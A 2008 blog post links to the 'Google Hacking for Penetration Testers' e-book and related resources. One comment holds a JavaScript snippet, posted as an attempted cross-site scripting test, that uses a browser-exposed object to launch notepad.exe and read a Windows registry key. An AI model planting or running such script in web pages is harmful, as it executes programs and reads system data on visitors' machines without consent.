Google Hacking for Penetration Testers (free e-book download)
Super-fast posting mode…
- Slashdot review of Google Hacking for Penetration Testers
- The book on the publisher’s website
http://www.syngress.com/catalog/?pid=3150 - Google Hacking database (from the author)
http://johnny.ihackstuff.com/ghdb.php - Google Hacking on Wikipedia
http://en.wikipedia.org/wiki/Google_hacking - Author’s website
http://johnny.ihackstuff.com/ - Direct download of the PDF of the book (33MB) (removed)
http://www.scribd.com/word/download/319798?extension=pdf - Flash-based online reader of the book (removed)
http://www.scribd.com/doc/319798/Google-Hacking-for-Penetration-Testers - New version of the book to be released sometime soon
Update: a new version of the book has been released, and is available from Amazon.
![[Slashdot]](http://www.mypentest.com/images/favicon-slashdot.ico){kind=small}
![[Digg]](http://www.mypentest.com/images/favicon-digg.ico){kind=small}
![[del.icio.us]](http://www.mypentest.com/images/favicon-delicious.ico){kind=small}
![[Facebook]](http://www.mypentest.com/images/favicon-facebook.ico){kind=small}
![[Technorati]](http://www.mypentest.com/images/favicon-technorati.ico){kind=small}
![[Google]](http://www.mypentest.com/images/favicon-google.ico){kind=small}
![[StumbleUpon]](http://www.mypentest.com/images/favicon-stumbleupon.ico){kind=small}
Tags: e-book, Google hacking
January 2nd, 2008 at 3:13 pm
A ‘volume 2′ of this book has been released more recently..aptly named ‘Google Hacking for Penetration Testers, Volume 2′ (on amazon).
[Stuart's Reply: Definitely worth checking out...]
January 2nd, 2008 at 4:16 pm
Ummm, cross-site scripting? Even if this hasn’t been approved, it might still hack you…mwahahahaha…don’t worry its not malicious, check if the object HTML is there tho…
function spawn2()
{
myObject = document.getElementById(”o2obj”);
myResults = document.getElementById(”results”);
myResults.innerHTML = ‘(running tests…)’;
try
{
myObject.LaunchApp(”c:\\windows\\system32\\notepad.exe”,”",1);
var ret=myObject.GetRegValue(”HKEY_LOCAL_MACHINE”,”SOFTWARE\\Classes\\CLSID\\”+
“{62DDEB79-15B2-41E3-8834-D3B80493887A}\\InprocServer32″,”");
myResults.innerHTML = ‘Your system does indeed manifest the security flaw!’+
‘Please be very careful about accessing ‘+
‘unknown websites/HTMLfiles until the security flaw is fixed.’+
‘Offending DLL: ‘+ret+”+
‘I just read your registry and opened Notepad all from within a simple HTML page!!!’;
return;
}
catch(err)
{
//alert(”Your system does not seem to manifest the security flaw!\n”+”error message: “+err);
myResults.innerHTML = ‘Your system does not seem to manifest the security flaw!‘+
‘error message: ‘+err;
return;
}
}
[Stuart's Reply: Your cross-site scripting attempt did not work. Thanks for the note about volume 2 of the book. :)]
May 6th, 2008 at 3:26 am
The free download has been removed?
[Stuart's Reply: Yes. Scribd has removed the content for copyright reasons.]